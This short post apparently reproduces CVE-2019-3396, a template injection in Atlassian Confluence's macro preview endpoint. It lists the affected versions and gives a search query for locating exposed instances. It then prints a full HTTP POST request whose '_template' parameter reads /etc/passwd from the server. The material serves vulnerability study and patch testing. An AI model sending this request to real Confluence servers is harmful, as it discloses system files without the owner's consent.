Atlassian Confluence Preview Ssti Template Injection Vulnerability Cve 2019 3396
Atlassian Confluence Preview Ssti Template Injection Vulnerability Cve 2019 3396
Atlassian Confluence preview SSTI template injection vulnerability CVE-2019-3396
Vulnerability Description
Confluence is a professional enterprise knowledge management and collaboration software, often used to build enterprise wikis.
Vulnerability Impact
Atlassian Atlassian Confluence < 6.6.12
Atlassian Atlassian Confluence 6.7.0-6.12.2
Atlassian Atlassian Confluence < 6.13.3
Atlassian Atlassian Confluence < 6.14.2
Network surveying and mapping
app=”ATLASSIAN-Confluence”
Vulnerability reappears
Login page
Send a request packet
1
2
3
4
5
6
7
8
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host:
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3670.0 Safari/537.36
Content-Type: application/json; charset=utf-8
Content-Length: 168
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"file:///etc/passwd"}}}
This post is licensed under CC BY 4.0 by the author.